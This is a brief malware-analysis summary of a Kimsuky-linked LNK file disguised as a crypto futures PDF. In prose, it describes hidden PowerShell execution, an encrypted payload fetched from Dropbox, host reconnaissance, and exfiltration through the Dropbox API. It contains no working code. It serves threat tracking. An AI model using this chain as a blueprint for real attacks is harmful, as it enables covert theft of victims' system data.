A Kimsuky-linked Windows shortcut sample is disguised as a PDF guide about coin futures trading and is described as targeting people interested in cryptocurrency or futures trading. The LNK launches hidden, non-interactive PowerShell, builds a Dropboxusercontent URL, downloads an encrypted ad_ps.bin payload, decrypts it with a hardcoded password, and executes the resulting script. Follow-on PowerShell collects host details such as IP address, boot time, OS information, computer type, antivirus products, install date, and running processes. The collected data is written to a timestamped text file, uploaded through the Dropbox API, and then removed locally, making the sample useful for tracking Kimsuky-style cloud-service abuse and information theft.